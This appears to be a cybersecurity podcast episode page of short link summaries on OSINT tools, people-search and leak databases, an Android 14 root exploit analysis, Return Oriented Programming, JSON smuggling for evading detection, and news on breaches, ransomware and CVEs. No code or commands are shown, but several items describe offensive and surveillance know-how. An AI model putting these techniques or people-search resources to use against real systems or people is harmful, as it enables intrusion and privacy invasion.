# Latest Podcast
# Description
Today, Trail of Bits releasing weAudit, which helps with code auditing in VSCode. There's a tool called Instagram User ID Finder for users to find Instagram IDs without logging in. The site Kontragenta.net offers a database for verifying information about legal subjects and others. Various OSINT tools are listed for cyber intelligence like search engines, and domain info. A text talks about a free phone number search tool for investigating numbers. An expert released a kernel exploit analysis for Android 14 on Google Pixel devices. Geowifi helps find WiFi networks by BSSID/SSID. ShodanX is a cybersecurity tool for using Shodan for free. Firefox's security is improved through JSIPC and tooling for identifying sandbox vulnerabilities. NoArgs hides Windows process arguments for privacy. The xai-org/grok-1 repository has a huge Grok-1 model requiring a strong GPU. Shodan is a search engine for finding exposed internet devices. There's a discussion on military tech showing a pivot to drones over traditional aircraft. Techniques like Return Oriented Programming for buffer overflow exploits and a new method called JSON Smuggling are explained.
# Tradecraft
[#]
Trail of Bits has released weAudit, a VSCode extension designed for effective code auditing with features like tracking bugs, bookmarking, collaboration, and direct creation of GitHub issues.
[#]
The Instagram User ID Finder is a tool that allows anyone to retrieve a unique numeric identifier for any Instagram account using just the username, without needing to log in, and it includes features for converting a User ID back into a username.
[#]
The website Kontragenta.net provides a collection of regularly updated links to official and private databases where you can verify information on legal entities, individuals, real estate, legal disputes, construction firms, phone numbers, bank details, vehicles, and more, without storing any personal user data.
[#]
The text lists various OSINT tools and resources that can be utilized for cyber intelligence gathering, including people search engines, image and face search platforms, domain and IP aggregators, forensic tools, leak databases, and more.
[#]
The provided text outlines a free phone number search tool used for investigating different phone number formats on various search engines.
[#]
A cyber security expert discloses a complete analysis and exploit for Android 14 kernel vulnerabilities on Google Pixel 7 and 8 Pro devices, with solutions for achieving root access and disabling SELinux included.
[#]
Geowifi is a tool that enables users to search for WiFi networks by their BSSID or SSID using various public databases and it provides the results in different formats, such as maps or JSON.
[#]
ShodanX is a free and open-source command-line tool for cybersecurity enthusiasts to gather information about targets using Shodan without requiring a paid API key, providing various search modes and colorful outputs to enhance data analysis.
[#]
In order to enhance Firefox's security, engineers utilize JavaScript Inter-Process Communication for privilege separation, with JSActors for process-specific messaging and MessageManagers for broader communication, while debugging tools aid in identifying sandbox escape vulnerabilities.
[#]
NoArgs is a cybersecurity tool that hides or changes the command-line arguments of processes on Windows by hooking into the system's API and manipulating the Process Environment Block to avoid detection.
[#]
The xai-org/grok-1 repository contains JAX code to load and run the Grok-1 model with 314 billion parameters, and you can get the weights using a torrent link or from HuggingFace, but a powerful GPU is needed due to the model's size.
[#]
Shodan is a search engine for internet-connected devices where you can use specific queries, known as Shodan Dorks, to find devices like webcams, databases, and industrial control systems that may be exposed due to misconfiguration or security weaknesses.
[#]
A discussion around drone warfare reveals a shift from expensive traditional aircraft like the F-35A to cost-effective drones for both attack and reconnaissance, showing a strategic pivot in military technology and tactics.
[#]
To exploit buffer overflow vulnerabilities, adversaries use Return Oriented Programming, manipulating the stack to execute code sequences called gadgets available in the system's memory, circumventing security defenses like ASLR; this technique is demonstrated using a C program that forcefully links to a system function and opens a shell without triggering security fault logs.
[#]
The text describes a proof of concept for a technique called JSON Smuggling, which encodes arbitrary files into JSON using invisible characters to evade detection.
# News
[#]
Radiant Earth is a non-profit that improves data sharing for community projects using initiatives like Source Cooperative for secure data exchange and the Cloud-Native Geospatial Foundation for efficient geospatial data handling.
[#]
IDINFO is a search and analytical system that offers subscriptions for entrepreneurs, providing analytical reports and has a public offer and data processing policy available on its website.
[#]
The website namebook.club requires a security check to confirm that a user is not a robot before granting access to its content.
[#]
YooSonar is a search engine tailored for indexing and searching the darknet's verified resources, offering access to typically hard-to-find materials without phishing sites and irrelevant ads.
[#]
A Russian website offers a people search service using personal data gathered from social networks and other internet sources, which raises concerns about privacy and data protection compliance.
[#]
The text appears to be mainly a list of countries along with search options for profiles on a Russian social network site, BigBookName.com, detailing the names and locations of various individuals.
[#]
The provided text appears to be from an information and search system named "Тут Найдут!" which includes a vast list of regions and segments for property and population searches in the year 2024.
[#]
VIN01.RU is a Russian website that provides free information on vehicles, including registration history, accident involvement, legal status, and mileage, using public databases like the traffic police and state technical inspection sites.
[#]
An analysis using Sergei Shpilkin's method suggests around half the votes reported for Putin in a Russian election were fraudulent, shining a light on significant electoral integrity issues.
[#]
Ukrainian hackers have exposed detailed Russian plans for extensive internal reforms and further international aggression following the 2024 elections, based on leaked documents signed by Putin.
[#]
Fujitsu, a global information and communication technology company, has announced recruitment plans, strengthened its partnership with AWS to modernize legacy applications through cloud solutions, and joined forces with a Japanese research group to develop a high-performance computing platform using a newly created 64-qubit quantum computer.
[#]
Cyble's latest analysis reveals a new ransomware called Darkrace, showing similarities to LockBit, targeting Windows systems and employing double-extortion tactics by encrypting files and threatening to release stolen data.
[#]
The Apex Legends Global Series North American finals were delayed because players' game clients were hacked during the tournament, revealing a potential remote code execution vulnerability which is currently being investigated.
[#]
A recent cyber attack campaign named DEEP#GOSU, suspected to be connected with North Korean group Kimsuky, uses sophisticated malware tactics including PowerShell and VBScript to infect Windows systems, evade detection, and steal sensitive information using cloud services like Dropbox and Google Docs for command and control.
[#]
A significant vulnerability in the Spring Security framework for Java applications could allow unauthorized access, and users must upgrade to the latest patched versions to mitigate this risk.
[#]
A significant security flaw in Podman and Buildah, identified as CVE-2024-1753, could allow attackers to access the host system during container builds, and users should update to patched versions immediately.
[#]
Japanese IT company Fujitsu confirmed a malware infection on their systems led to a data breach compromising customer information and is currently investigating the extent of data exfiltration.
[#]
Fortra recently fixed a critical vulnerability in its FileCatalyst software that could have let hackers run their code on servers, and users should update to the corrected version to stay secure.
[#]
The Lazarus Group has laundered over $23 million of stolen funds through Tornado Cash, despite U.S. sanctions and law enforcement actions against similar crypto-mixers.
[#]
Instant messaging service Viber is investigating a claim by Handala Hack that they stole 740GB of data, while other security breaches have occurred at Fujitsu and Mintlify, and a new AI cybersecurity collaboration has been announced between CrowdStrike and Nvidia.
[#]
Check Point's Threat Intelligence Bulletin reports cyber incidents including a Nissan data breach affecting customers and an Adobe security patch, plus analytical insights on malware trends and ransomware campaign tactics.
[#]
Hackers exploit Ethereum's CREATE2 function to trick users into authorizing transactions for smart contracts that aren't deployed yet, allowing them to later deploy malicious contracts and access victims' cryptocurrency funds, which highlights the need for updated security measures in digital wallets to prevent such attacks.
[#]
The Apex Legends Global Series tournament was postponed due to a cyberattack that gave players unauthorized cheating abilities, suspected to be from exploiting a remote code execution vulnerability.
[#]
The National Vulnerability Database has stopped updating critical metadata for software vulnerabilities since February 12, 2024, which prevents organizations from effectively managing their cybersecurity risks.
[#]
Cybersecurity experts have found a widespread malware campaign using fake Google Sites and a method called HTML smuggling to infect devices with AZORult, which steals sensitive data and cryptocurrency wallet contents.
[#]
The aviation and aerospace sectors are experiencing a sharp increase in cyber threats, prompting the need for improved cybersecurity risk assessments and proactive threat intelligence, especially in light of recent Lockbit 3.0 ransomware attacks on airlines and aerospace firms around the globe.
[#]
South Africa's pension agency GPAA is probing a data leak after the LockBit ransomware gang claimed it had stolen and dumped 668GB of sensitive data online; protective measures against such threats include multifactor authentication, regular backup testing, endpoint protection, and managing vulnerabilities.
[#]
Gartner analysts recommend that cyber security teams should plan and rehearse incident recovery, report small incidents to improve responses, and support staff mental health to maintain effective operations.
[#]
Trend Micro discovered an advanced persistent threat named Earth Krahang, affiliated with China and targeting global government entities, using spear-phishing, exploiting vulnerabilities, and weaponizing compromised infrastructure, with recommendations to patch systems timely, enhance employee phishing awareness, implement zero-trust, and use multi-layered defenses.
[#]
The International Monetary Fund confirmed that eleven of its email accounts were breached, and after securing them, it continues to investigate without signs of additional compromise.
[#]
Security professionals report a new Android trojan called PixPirate targeting Brazilian bank users, using invisible icons and service-based execution to avoid detection, and capable of manipulating transactions and stealing credentials.
[#]
Filipino police have liberated 875 individuals from a fraudulent online gaming company involved in romance scams, resulting in nine arrests and the seizure of weapons, mobile phones, and vehicles.
[#]
WordPress admins should immediately delete miniOrange's Malware Scanner and Web Application Firewall plugins due to a critical flaw that allows unauthenticated attackers to gain administrative privileges.
[#]
The hacker group APT28, also known by many other names, is conducting widespread phishing campaigns in multiple regions by using deceptive documents and exploiting various software vulnerabilities to insert malware such as MASEPIE, OCEANMAP, and STEELHOOK.
[#]
Recent cybersecurity incidents include a multi-million dollar hack of the Remilia Collective, a significant theft from NFPrompt, an accidental burn of $1.36 million in Tether, the recovery of 90% of stolen assets by Mozaic Fi, a $2.3 million civil forfeiture action related to a romance scam, a $2 million loss due to a phishing attack, extortion by Incognito Market drug marketplace, Kickstarter's abandoned blockchain pivot influenced by a secret $100 million investment, and the theft of over $46 million through Twitter phishing in February 2024.
[#]
Two command injection vulnerabilities found in TRENDnet AC2600 routers, CVE-2024-28353 and CVE-2024-28354, permit remote takeovers if the remote admin feature is active; a firmware patch is expected by March 27th, turn off remote admin as a temporary measure.
[#]
Autodesk has resolved critical security flaws in design software by releasing patches for CVE-2024-23138 and CVE-2024-23139, which could crash applications, steal data, or take over systems if exploited.
[#]
Fujitsu has reported a breach in their security due to malware, compromising customer and personal information, and advises users to change passwords, monitor accounts, and beware of phishing scams.
[#]
Cybersecurity experts are alerting about SVG files being used to deliver malware such as remote access trojans and keyloggers, recommending proactive defense and user education against this rising threat vector.
[#]
Cloudflare has mitigated a side-channel threat to its ChatGPT-based AIs by adding variable-length padding to its JSON-streamed tokens, while security flaws in various industrial systems and a malicious infostealer targeting Roblox users have prompted advisories for patches and user caution.
[#]
A hacker group leaked personal information of 71 million AT&T customers from a supposed 2021 breach, but AT&T denies the data came from their systems; users should be cautious of phishing attacks.